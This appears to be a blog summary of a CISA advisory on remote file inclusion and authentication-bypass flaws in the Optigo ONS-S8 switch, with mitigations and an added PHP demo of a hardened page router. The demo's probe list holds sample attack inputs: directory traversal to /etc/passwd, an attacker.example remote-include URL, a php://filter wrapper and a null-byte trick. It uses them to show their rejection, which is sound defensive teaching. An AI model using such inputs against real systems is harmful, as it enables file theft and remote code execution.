CISA Advisory: Critical Vulnerabilities in Optigo Networks ONS-S8 Switch

Vulnerabilities in the equipment that runs critical infrastructure have consequences well beyond the device itself. A recently released advisory from the Cybersecurity and Infrastructure Security Agency (CISA) describes two critical vulnerabilities in the Optigo Networks ONS-S8 Spectra Aggregation Switch, an aggregation switch used in operational technology (OT) networks. Let's dig into the details of the advisory and what it means for organizations that run this hardware.

1. Executive Summary

The CISA advisory, designated ICSA-24-275-01, covers two vulnerabilities in the switch. The key facts:
  • CVSS v4 Score: 9.3 (Critical)
  • Attention: Exploitable remotely, low attack complexity
  • Vendor: Optigo Networks
  • Equipment: ONS-S8 Spectra Aggregation Switch
  • Vulnerabilities Identified:
    • Improper Control of Filename for Include/Require Statement in PHP Program, i.e. PHP Remote File Inclusion (CWE-98)
    • Weak Authentication (CWE-1390)
Both issues are reachable over the network with low complexity, which is why addressing them is urgent.

2. Risk Evaluation

The advisory states that successful exploitation of these vulnerabilities could allow an attacker to:
  • Achieve remote code execution
  • Perform arbitrary file uploads
  • Bypass authentication
Because the switch aggregates traffic for OT networks, compromise of the device puts the networks behind it at risk, and organizations using the ONS-S8 should act quickly to limit who can reach its management interface.

3. Technical Details

3.1 Affected Products

Only ONS-S8 Spectra Aggregation Switch versions 1.3.7 and prior are affected, so administrators can determine exposure from the firmware version alone.

3.2 Vulnerability Overview

3.2.1 PHP Remote File Inclusion (CWE-98)

The web service of the ONS-S8 lets attacker-influenced input determine which file a PHP include/require statement loads, the classic remote file inclusion weakness. An attacker who can reach the web service can:
  • Perform directory traversal
  • Bypass authentication
  • Execute arbitrary code
  • Associated CVE: CVE-2024-41925
  • CVSS v3 Base Score: 9.8
  • CVSS v4 Score: 9.3

3.2.2 Weak Authentication (CWE-1390)

The second vulnerability is an incomplete authentication process in the device's web interface that could allow an attacker to gain unauthorized access without supplying a password.
  • Associated CVE: CVE-2024-45367
  • CVSS v3 Base Score: 9.1
  • CVSS v4 Score: 9.3
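The advisory does not describe the switch's actual code paths, so the following PHP script is an added illustration of the two weakness classes above, not code from the advisory or from Optigo Networks. It puts the typical CWE-98 pattern (a request parameter flowing straight into `include`) next to a hardened request handler that decides authentication first and returns before anything is included, then resolves the page parameter through an exact allow-list and a canonical-path check. The page names, directory layout and session shape are assumptions for the demo; the script creates its own page files in a temporary directory, so it runs offline with `php demo.php` on PHP 8.

```php
<?php
declare(strict_types=1);
// Added illustration, not Optigo Networks code. Shows the CWE-98 pattern
// (request parameter flows into include) next to a hardened page router that
// enforces authentication before any include and only includes allow-listed
// files. Page names, paths and session layout are hypothetical. Needs PHP 8.

// --- Vulnerable pattern (CWE-98) -------------------------------------------
// Classic form: include($_GET['page']); whatever the client sends becomes the
// include target. With allow_url_include=On a URL is fetched and executed
// (remote file inclusion); with it Off, '../' traversal and php:// wrappers
// still give local file inclusion and source disclosure.
function vulnerable_include_target(string $page): string
{
    return $page; // no validation at all
}

// --- Hardened router ---------------------------------------------------------
const PAGE_ALLOWLIST = ['status', 'ports', 'vlans', 'logs']; // hypothetical pages

// Map the request parameter to a file only if it is an exact allow-list key AND
// the canonicalised result still sits under the pages directory.
function resolve_page(string $page, string $base): ?string
{
    if (!in_array($page, PAGE_ALLOWLIST, true)) {
        return null;
    }
    $root = realpath($base . '/pages');
    $path = realpath($base . '/pages/' . $page . '.php');
    if ($root === false || $path === false || !str_starts_with($path, $root . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

// Authentication is decided first and returns early. A guard that only emits a
// redirect header without stopping execution would leave the include reachable
// to anonymous callers, which is one common shape of an incomplete auth check.
function handle_request(array $session, array $query, string $base): string
{
    if (empty($session['user'])) {
        return 'HTTP 302 -> /login.php (nothing included)';
    }
    $path = resolve_page((string) ($query['page'] ?? ''), $base);
    if ($path === null) {
        return 'HTTP 404 (rejected)';
    }
    ob_start();
    include $path;
    return ob_get_clean();
}

// --- Demo: constructed page files and probe inputs --------------------------
$base = sys_get_temp_dir() . '/ons-demo-' . getmypid();
mkdir($base . '/pages', 0700, true);
foreach (PAGE_ALLOWLIST as $name) {
    file_put_contents("$base/pages/$name.php", "<?php echo 'rendered ' . basename(__FILE__);");
}

$probes = [
    'status',                                            // legitimate page
    '../../../../etc/passwd',                            // traversal / LFI
    'http://attacker.example/shell.txt',                 // RFI if allow_url_include=On
    'php://filter/convert.base64-encode/resource=index', // source disclosure wrapper
    "status\0",                                          // null-byte suffix trick
];
foreach ($probes as $p) {
    $shown = json_encode($p, JSON_UNESCAPED_SLASHES);
    printf("%-52s vulnerable -> include(%s)\n", $shown, json_encode(vulnerable_include_target($p), JSON_UNESCAPED_SLASHES));
    printf("%-52s hardened   -> %s\n", '', handle_request(['user' => 'admin'], ['page' => $p], $base));
}
printf("%-52s hardened   -> %s\n", 'anonymous, page=status', handle_request([], ['page' => 'status'], $base));

// Remove the constructed demo files.
foreach (PAGE_ALLOWLIST as $name) {
    unlink("$base/pages/$name.php");
}
rmdir($base . '/pages');
rmdir($base);
```

Two design points matter here. The parameter is treated as a key into a fixed table, never as a path fragment, so traversal sequences, stream wrappers and URLs are rejected before any filesystem or network access happens; the `realpath` prefix check is a second, independent line of defence. And the authentication decision is a plain early return, so there is no code path in which an unauthenticated request reaches the include at all.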

3.3 Background

The advisory lists the affected device under the Critical Manufacturing sector, with deployments worldwide, so the vulnerabilities can affect industrial operations on a global scale.

3.4 Researcher

These vulnerabilities were identified by the Claroty Team82, a notable player in industrial cybersecurity.

4. Mitigations

To limit exposure, Optigo Networks and CISA recommend several measures, all of which reduce who can reach the OneView management interface:
  1. Unique Management VLAN: Always use a distinct management VLAN for the ports that connect to OneView.
  2. Dedicated NIC: Give the BMS computer a dedicated Network Interface Card (NIC) used exclusively for connecting to OneView.
  3. Firewall Whitelist: Set up a router firewall with a whitelist of the devices permitted to connect to OneView.
  4. Secure VPN Connections: Use secure VPN connections for access to OneView.
CISA also advises organizations to perform a proper impact analysis and risk assessment before deploying defensive measures, and to follow its published best practices for industrial control system security, including defense in depth.

5. Update History

  • October 1, 2024: Initial publication of the advisory.

Conclusion

Organizations relying on the Optigo Networks ONS-S8 Spectra Aggregation Switch should review how the device's management interface is reached today and implement the recommended network mitigations without delay. Given the critical CVSS scores, restricting access to OneView protects both the switch and the OT networks it aggregates.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA so far, but the advisory is a timely reminder to stay vigilant and prepared.
Stay alert, keep your systems updated, and remember: in the world of IT security, prevention is always better than cure!
For further information and resources, see CISA's recommended cybersecurity practices for industrial control systems.
Source: CISA, "Optigo Networks ONS-S8 Spectra Aggregation Switch" (ICSA-24-275-01)